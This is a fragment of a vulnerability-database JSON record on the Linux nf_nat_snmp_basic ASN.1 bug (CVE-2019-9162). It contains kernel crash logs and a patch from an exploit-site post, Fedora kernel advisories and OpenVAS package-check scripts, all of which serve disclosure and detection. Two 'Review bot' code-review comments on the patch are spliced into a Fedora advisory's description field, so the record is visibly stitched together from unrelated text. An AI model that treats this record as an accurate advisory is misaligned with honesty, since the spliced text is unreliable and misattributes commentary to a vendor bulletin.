ffff8881e083fe78\r\n[ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.717071] CS: 0010 
DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.722923] Fixing recursive fault but reboot is needed!\r\n======================================================================\r\n\r\n\r\nIt also works against a Debian testing distro kernel if you first (as root)\r\nset kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat:\r\n\r\n======================================================================\r\n[17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready\r\n[17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready\r\n[17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready\r\n[17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[17261.115583] BUG: Bad page state in process Xorg pfn:276500\r\n[17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0\r\n[17261.115595] flags: 0x17fffc000000000()\r\n[17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000\r\n[17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000\r\n[17261.115601] page dumped because: nonzero _count\r\n[17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm 
drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel\r\n[17261.115641] ata_piix libata ehci_pci aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy\r\n[17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1\r\n[17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[17261.115654] Call Trace:\r\n[17261.115681] dump_stack+0x5c/0x80\r\n[17261.115688] bad_page.cold.115+0x7f/0xb2\r\n[17261.115690] get_page_from_freelist+0xf51/0x1200\r\n[17261.115694] ? reservation_object_reserve_shared+0x32/0x70\r\n[17261.115696] ? get_page_from_freelist+0x8c3/0x1200\r\n[17261.115698] __alloc_pages_nodemask+0x112/0x2b0\r\n[17261.115703] new_slab+0x288/0x6e0\r\n[17261.115707] ? update_blocked_averages+0x3ca/0x560\r\n[17261.115708] ___slab_alloc+0x378/0x500\r\n[17261.115710] ? update_nohz_stats+0x41/0x50\r\n[17261.115713] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115715] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115716] __slab_alloc+0x1c/0x30\r\n[17261.115717] kmem_cache_alloc+0x192/0x1c0\r\n[17261.115719] shmem_alloc_inode+0x16/0x30\r\n[17261.115722] alloc_inode+0x1b/0x80\r\n[17261.115725] new_inode_pseudo+0xc/0x60\r\n[17261.115726] new_inode+0x12/0x30\r\n[17261.115728] shmem_get_inode+0x49/0x220\r\n[17261.115731] __shmem_file_setup.part.42+0x3f/0x130\r\n[17261.115754] drm_gem_object_init+0x26/0x40 [drm]\r\n[17261.115758] qxl_bo_create+0x79/0x170 [qxl]\r\n[17261.115762] qxl_gem_object_create+0x60/0x120 [qxl]\r\n[17261.115764] ? 
qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl]\r\n[17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl]\r\n[17261.115777] ? drm_dev_enter+0x19/0x50 [drm]\r\n[17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm]\r\n[17261.115807] drm_ioctl+0x1fc/0x390 [drm]\r\n[17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220\r\n[17261.115814] ? __hrtimer_init+0xb0/0xb0\r\n[17261.115816] ? timerqueue_add+0x52/0x80\r\n[17261.115834] ? enqueue_hrtimer+0x38/0x90\r\n[17261.115835] ? hrtimer_start_range_ns+0x1b7/0x2c0\r\n[17261.115836] do_vfs_ioctl+0xa4/0x630\r\n[17261.115840] ? __sys_recvmsg+0x83/0xa0\r\n[17261.115841] ksys_ioctl+0x60/0x90\r\n[17261.115843] __x64_sys_ioctl+0x16/0x20\r\n[17261.115846] do_syscall_64+0x53/0x100\r\n[17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[17261.115852] RIP: 0033:0x7fb3e93d3747\r\n[17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48\r\n[17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010\r\n[17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747\r\n[17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e\r\n[17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1\r\n[17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440\r\n[17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0\r\n[17261.115860] Disabling lock debugging due to kernel taint\r\n======================================================================\r\n\r\n\r\nI suggest the following patch (copy attached with proper whitespace); I have\r\ntested that it prevents my PoC from crashing the kernel, but I haven't tested\r\nwhether SNMP NATting still 
works.\r\n\r\n======================================================================\r\nFrom b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001\r\nFrom: Jann Horn <[email\u00a0protected]>\r\nDate: Wed, 6 Feb 2019 22:56:15 +0100\r\nSubject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in\r\n ASN.1 cbs\r\n\r\nThe generic ASN.1 decoder infrastructure doesn't guarantee that callbacks\r\nwill get as much data as they expect; callbacks have to check the `datalen`\r\nparameter before looking at `data`. Make sure that snmp_version() and\r\nsnmp_helper() don't read/write beyond the end of the packet data.\r\n\r\n(Also move the assignment to `pdata` down below the check to make it clear\r\nthat it isn't necessarily a pointer we can use before the `datalen` check.)\r\n\r\nFixes: cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\")\r\nSigned-off-by: Jann Horn <[email\u00a0protected]>\r\n---\r\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++-\r\n 1 file changed, 6 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\nindex a0aa13bcabda..0a8a60c1bf9a 100644\r\n--- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n+++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n@@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset)\r\n int snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n+ if (datalen != 1)\r\n+ return -EINVAL;\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n@@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n- __be32 *pdata = (__be32 *)data;\r\n+ __be32 *pdata;\r\n \r\n+ if (datalen != 4)\r\n+ return -EINVAL;\r\n+ pdata = (__be32 *)data;\r\n if (*pdata == ctx->from) {\r\n 
pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n-- \r\n2.20.1.611.gfbb209baf1-goog\r\n======================================================================\n\n# 0day.today [2019-03-05] #", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/32291"}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. ", "modified": "2019-03-01T02:41:34", "published": "2019-03-01T02:41:34", "id": "FEDORA:9FFEF6014BBC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: kernel-headers-4.20.12-200.fc29", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": "Kernel-headers includes the C header files that specify the interface between the Linux kernel and userspace libraries and programs. The header files define structures and constants that are needed for building most standard programs and are also needed for rebuilding the glibc package. 
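Review bot: the new `if (datalen != 1) return -EINVAL;` guard in snmp_version() should carry a one-line comment stating that the ASN.1 decoder passes callbacks whatever length was on the wire, so `data` must not be dereferenced until `datalen` has been validated; the rationale is only in the commit message, and anyone adding another callback to this file will read the code, not the log.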
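Review bot: in the snmp_helper() hunk, `pdata = (__be32 *)data;` discards the `const` of the `const void *data` parameter, and the following `*pdata == ctx->from` compare dereferences packet payload as a `__be32`, which is not guaranteed to be 4-byte aligned; moving the assignment below the `datalen != 4` check is the right fix for the bounds problem, but the const-discarding cast deserves a comment explaining that in-place modification of the packet is intended, and the load would be safer through an unaligned accessor.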
", "modified": "2019-03-11T20:20:34", "published": "2019-03-11T20:20:34", "id": "FEDORA:7723E6075F15", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: kernel-headers-4.20.14-100.fc28", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-16862", "CVE-2018-16880", "CVE-2018-18710", "CVE-2018-19407", "CVE-2018-19824", "CVE-2019-3459", "CVE-2019-3460", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-7221", "CVE-2019-7222", "CVE-2019-8912", "CVE-2019-8980", "CVE-2019-9162"], "description": "The kernel meta package ", "modified": "2019-03-01T02:41:34", "published": "2019-03-01T02:41:34", "id": "FEDORA:20DCB60779B2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: kernel-4.20.12-200.fc29", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-10322", "CVE-2018-10323", "CVE-2018-10840", "CVE-2018-10853", "CVE-2018-1108", "CVE-2018-1120", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-12633", "CVE-2018-12714", "CVE-2018-12896", "CVE-2018-13053", "CVE-2018-13093", "CVE-2018-13094", "CVE-2018-13095", "CVE-2018-13405", "CVE-2018-14633", "CVE-2018-14678", "CVE-2018-14734", "CVE-2018-15471", "CVE-2018-16862", "CVE-2018-16880", "CVE-2018-17182", "CVE-2018-18710", "CVE-2018-19406", "CVE-2018-19407", "CVE-2018-19824", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-5391", "CVE-2019-3459", "CVE-2019-3460", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-7221", "CVE-2019-7222", "CVE-2019-8912", "CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": "The kernel meta package ", "modified": "2019-03-11T20:20:33", "published": "2019-03-11T20:20:33", "id": "FEDORA:E93AE6077DCD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: kernel-4.20.14-100.fc28", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], 
"openvas": [{"lastseen": "2019-05-29T18:32:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310875904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875904", "type": "openvas", "title": "Fedora Update for kernel-headers FEDORA-2019-7462acf8ba", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875904\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:26:45 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for kernel-headers FEDORA-2019-7462acf8ba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GSOTCU43RLEBAED6RYEVHNYONC3XWSOA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel-headers'\n package(s) announced via the FEDORA-2019-7462acf8ba advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Kernel-headers includes the C header files that specify the interface\nbetween the Linux kernel and userspace libraries and programs. 
The\nheader files define structures and constants that are needed for\nbuilding most standard programs and are also needed for rebuilding the\nglibc package.\");\n\n script_tag(name:\"affected\", value:\"'kernel-headers' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.20.12~200.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8980", "CVE-2019-9162", "CVE-2019-9213"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310875505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875505", "type": "openvas", "title": "Fedora Update for kernel-headers FEDORA-2019-196ab64d65", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be 
useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875505\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 04:12:20 +0100 (Tue, 12 Mar 2019)\");\n script_name(\"Fedora Update for kernel-headers FEDORA-2019-196ab64d65\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GI6YTN6SENQC7IZSHWB2HILUZEN3EFKP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel-headers'\n package(s) announced via the FEDORA-2019-196ab64d65 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"kernel-headers on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.20.14~100.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-04-26T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310843952", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843952", "type": "openvas", "title": "Ubuntu Update for linux USN-3930-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843952\");\n script_version(\"2019-04-26T08:24:31+0000\");\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\",\n \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\",\n \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\",\n \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 08:24:31 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:39:35 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Ubuntu Update for linux USN-3930-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.10\");\n\n script_xref(name:\"USN\", value:\"3930-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3930-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the USN-3930-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mathias Payer and Hui Peng discovered\na use-after-free vulnerability in the Advanced Linux Sound Architecture\n(ALSA) subsystem. 
A physically proximate attacker could use this to cause\na denial of service (system crash). (CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information\nleak in the Bluetooth implementation of the Linux kernel. An attacker\nwithin Bluetooth range could use this to expose sensitive information\n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM with\naccess to /dev/kvm could use this to cause a denial of service (guest VM\ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in\nthe KVM subsystem of the Linux kernel, when using nested virtual machines.\nA local attacker in a guest VM could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code in the host system.\n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in\nthe KVM subsystem of the Linux kernel, when nested virtualization is used.\nA local attacker could use this to expose sensitive information (host\nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was\ninsufficiently hardened against Spectre V1 attacks. A local attacker could\nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user-\nspace API for crypto (af_alg) implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. 
(CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory\nwhen handling certain errors while reading files. A local attacker could\nuse this to cause a denial of service (excessive memory consumption).\n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI\nimplementation in the Linux kernel. A local attacker with access to the\nIPMI character device files could use this to cause a denial of service\n(system crash). (CVE-2019-9003)\n\nJann Horn discovered that the SNMP NAT implementation in the Linux kernel\nperformed insufficient ASN.1 length checks. An atta ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux' package(s) on Ubuntu 18.10.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.10\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1008-gcp\", ver:\"4.18.0-1008.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1009-kvm\", ver:\"4.18.0-1009.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1011-raspi2\", ver:\"4.18.0-1011.13\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1012-aws\", ver:\"4.18.0-1012.14\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1014-azure\", ver:\"4.18.0-1014.14\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic\", 
ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic-lpae\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-lowlatency\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-snapdragon\", ver:\"4.18.0-17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.18.0.1012.12\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.18.0.1014.15\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gcp\", ver:\"4.18.0.1008.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-gke\", ver:\"4.18.0.1008.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.18.0.1009.9\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.18.0.1011.8\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.18.0.17.18\", rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual\", ver:\"4.18.0.17.18\", 